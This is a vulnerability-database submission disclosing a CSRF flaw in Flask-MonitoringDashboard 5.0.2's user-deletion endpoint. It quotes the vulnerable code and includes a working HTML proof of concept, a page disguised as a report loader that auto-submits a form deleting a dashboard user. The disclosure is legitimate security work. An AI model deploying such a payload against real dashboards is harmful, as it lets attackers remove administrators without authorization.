提交 #850878: flask-dashboard Flask-MonitoringDashboard v5.0.2 CSRF信息

标题flask-dashboard Flask-MonitoringDashboard v5.0.2 CSRF
描述# CSRF Vulnerability in User Deletion (/api/user/delete) ## Summary A **Cross-Site Request Forgery (CSRF)** vulnerability exists in the dashboard user-deletion endpoint `/api/user/delete`. The lack of CSRF protection allows an attacker to force an authenticated administrator to delete dashboard users without authorization. ## Vulnerability Details ### Configuration-Level Issue **File**: `flask_monitoringdashboard/core/auth.py` ```python def admin_secure(func): @wraps(func) def wrapper(*args, **kwargs): if session and session.get(config.link + '_logged_in'): # ❌ cookie-only authorization if session.get(config.link + '_admin'): return func(*args, **kwargs) return redirect(url_for(config.blueprint_name + '.login')) return wrapper # ❌ No CSRF protection anywhere in the package # ❌ Session cookie has no SameSite attribute enforced ``` ### Endpoint-Level Code Analysis **File**: `flask_monitoringdashboard/views/auth.py` (Lines 62-71) ```python @blueprint.route('/api/user/delete', methods=['POST']) @admin_secure def user_delete(): """Delete the user in the database.""" user_id = int(request.form['user_id']) # ❌ No CSRF token validation # ❌ No Origin/Referer verification if flask.session.get(config.link + '_user_id') == user_id: return jsonify({'message': 'Cannot delete itself.'}), BAD_REQUEST_STATUS with session_scope() as session: session.query(User).filter(User.id == user_id).delete() # ⚠️ deletes user return 'OK' ``` **Security Issues**: 1. ❌ No CSRF token validation 2. ❌ No origin verification 3. ⚠️ Deletes an arbitrary user (by `user_id`) based only on the session cookie ## Proof of Concept (PoC) ```html <!DOCTYPE html> <html> <head> <title>Loading report...</title> </head> <body> <h2>???? Generating your weekly report...</h2> <form id="csrf-form" action="http://127.0.0.1:5000/dashboard/api/user/delete" method="POST"> <input type="hidden" name="user_id" value="2"> </form> <script> setTimeout(function() { document.getElementById('csrf-form').submit(); }, 1000); </script> </body> </html> ``` ## Impact **Unauthorized user deletion** - An attacker can remove dashboard users (e.g. other administrators), disrupting access and monitoring. Combined with ISSUE_01, an attacker can delete legitimate admins after planting their own. --- **CVSS Score**: 6.5 (Medium) — `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N` **CWE**: CWE-352 (Cross-Site Request Forgery) --- **Reported by**: flashzyc **Date**: 2026-06-07
来源⚠️ https://github.com/flask-dashboard/Flask-MonitoringDashboard/issues/558
用户
 flashzyc (UID 92850)
提交2026-06-07 08時59分 (1 月前)
管理2026-07-08 09時38分 (1 month later)
状态重复
VulDB条目376785 [flask-dashboard Flask-MonitoringDashboard 直到 5.0.2 跨网站请求伪造]
积分0

Want to stay up to date on a daily basis?

Enable the mail alert feature now!